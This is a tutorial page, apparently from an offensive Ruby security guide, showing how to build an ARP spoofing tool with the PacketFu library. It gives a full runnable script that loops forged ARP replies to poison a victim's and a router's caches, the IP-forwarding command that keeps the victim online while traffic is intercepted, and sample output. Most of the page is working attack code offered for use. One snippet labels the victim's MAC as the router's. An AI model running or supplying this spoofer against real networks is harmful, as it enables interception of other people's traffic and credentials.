ARP Spoofing
As you know, ARP Spoofing attack in the core of MitM attacks. In this part we'll know how to write simple and effective ARP spoofer tool to use it in later spoofing attacks.

Scenario

We have 3 machines in this scenario as shown below.
1
|Attacker|
2
|
3
٧
4
|Victim| -----------------> |Router| ---> Internet
Copied!
Here the list of IP and MAC addresses of each of theme in the following table
Host/Info
IP Address
MAC Address
Attacker
192.168.0.100
3C:77:E6:68:66:E9
Victim
192.168.0.21
00:0C:29:38:1D:61
Router
192.168.0.1
00:50:7F:E6:96:20
To know our/attacker's interface information
1
info = PacketFu::Utils.whoami?(:iface => "wlan0")
Copied!
returns a hash
1
{:iface=>"wlan0",
2
:pcapfile=>"/tmp/out.pcap",
3
:eth_saddr=>"3c:77:e6:68:66:e9",
4
:eth_src=>"<w\xE6hf\xE9",
5
:ip_saddr=>"192.168.0.13",
6
:ip_src=>3232235533,
7
:ip_src_bin=>"\xC0\xA8\x00\r",
8
:eth_dst=>"\x00P\x7F\xE6\x96 ",
9
:eth_daddr=>"00:50:7f:e6:96:20"}
Copied!
So you can extract these information like any hash info[:iface], info[:ip_saddr], info[:eth_saddr], etc..
Building victim's ARP packet
1
# Build Ethernet header
2
arp_packet_victim = PacketFu::ARPPacket.new
3
arp_packet_victim.eth_saddr = "3C:77:E6:68:66:E9" # our MAC address
4
arp_packet_victim.eth_daddr = "00:0C:29:38:1D:61" # the victim's MAC address
5
# Build ARP Packet
6
arp_packet_victim.arp_saddr_mac = "3C:77:E6:68:66:E9" # our MAC address
7
arp_packet_victim.arp_daddr_mac = "00:0C:29:38:1D:61" # the victim's MAC address
8
arp_packet_victim.arp_saddr_ip = "192.168.0.1" # the router's IP
9
arp_packet_victim.arp_daddr_ip = "192.168.0.21" # the victim's IP
10
arp_packet_victim.arp_opcode = 2 # arp code 2 == ARP reply
Copied!
Building router packet
1
# Build Ethernet header
2
arp_packet_router = PacketFu::ARPPacket.new
3
arp_packet_router.eth_saddr = "3C:77:E6:68:66:E9" # our MAC address
4
arp_packet_router.eth_daddr = "00:0C:29:38:1D:61" # the router's MAC address
5
# Build ARP Packet
6
arp_packet_router.arp_saddr_mac = "3C:77:E6:68:66:E9" # our MAC address
7
arp_packet_router.arp_daddr_mac = "00:50:7F:E6:96:20" # the router's MAC address
8
arp_packet_router.arp_saddr_ip = "192.168.0.21" # the victim's IP
9
arp_packet_router.arp_daddr_ip = "192.168.0.1" # the router's IP
10
arp_packet_router.arp_opcode = 2 # arp code 2 == ARP reply
Copied!
Run ARP Spoofing attack
1
# Send our packet through the wire
2
while true
3
sleep 1
4
puts "[+] Sending ARP packet to victim: #{arp_packet_victim.arp_daddr_ip}"
5
arp_packet_victim.to_w(info[:iface])
6
puts "[+] Sending ARP packet to router: #{arp_packet_router.arp_daddr_ip}"
7
arp_packet_router.to_w(info[:iface])
8
end
Copied!
Source
Wrapping all together and run as root
1
#!/usr/bin/env ruby
2
#
3
# ARP Spoof Basic script
4
#
5
require 'packetfu'
6
7
attacker_mac = "3C:77:E6:68:66:E9"
8
victim_ip = "192.168.0.21"
9
victim_mac = "00:0C:29:38:1D:61"
10
router_ip = "192.168.0.1"
11
router_mac = "00:50:7F:E6:96:20"
12
13
info = PacketFu::Utils.whoami?(:iface => "wlan0")
14
#
15
# Victim
16
#
17
# Build Ethernet header
18
arp_packet_victim = PacketFu::ARPPacket.new
19
arp_packet_victim.eth_saddr = attacker_mac # attacker MAC address
20
arp_packet_victim.eth_daddr = victim_mac # the victim's MAC address
21
# Build ARP Packet
22
arp_packet_victim.arp_saddr_mac = attacker_mac # attacker MAC address
23
arp_packet_victim.arp_daddr_mac = victim_mac # the victim's MAC address
24
arp_packet_victim.arp_saddr_ip = router_ip # the router's IP
25
arp_packet_victim.arp_daddr_ip = victim_ip # the victim's IP
26
arp_packet_victim.arp_opcode = 2 # arp code 2 == ARP reply
27
28
#
29
# Router
30
#
31
# Build Ethernet header
32
arp_packet_router = PacketFu::ARPPacket.new
33
arp_packet_router.eth_saddr = attacker_mac # attacker MAC address
34
arp_packet_router.eth_daddr = router_mac # the router's MAC address
35
# Build ARP Packet
36
arp_packet_router.arp_saddr_mac = attacker_mac # attacker MAC address
37
arp_packet_router.arp_daddr_mac = router_mac # the router's MAC address
38
arp_packet_router.arp_saddr_ip = victim_ip # the victim's IP
39
arp_packet_router.arp_daddr_ip = router_ip # the router's IP
40
arp_packet_router.arp_opcode = 2 # arp code 2 == ARP reply
41
42
while true
43
sleep 1
44
puts "[+] Sending ARP packet to victim: #{arp_packet_victim.arp_daddr_ip}"
45
arp_packet_victim.to_w(info[:iface])
46
puts "[+] Sending ARP packet to router: #{arp_packet_router.arp_daddr_ip}"
47
arp_packet_router.to_w(info[:iface])
48
end
Copied!
Note: Don't forget to enable packet forwarding on your system to allow victim to browse internet.
echo "1" > /proc/sys/net/ipv4/ip_forward
Returns, time to wiresharking ;)
1
[+] Sending ARP packet to victim: 192.168.0.21
2
[+] Sending ARP packet to router: 192.168.0.1
3
.
4
.
5
.
6
[+] Sending ARP packet to victim: 192.168.0.21
7
[+] Sending ARP packet to router: 192.168.0.1
8
[+] Sending ARP packet to victim: 192.168.0.21
9
[+] Sending ARP packet to router: 192.168.0.1
Copied!
Last modified 2yr ago
Copy link
Contents
Scenario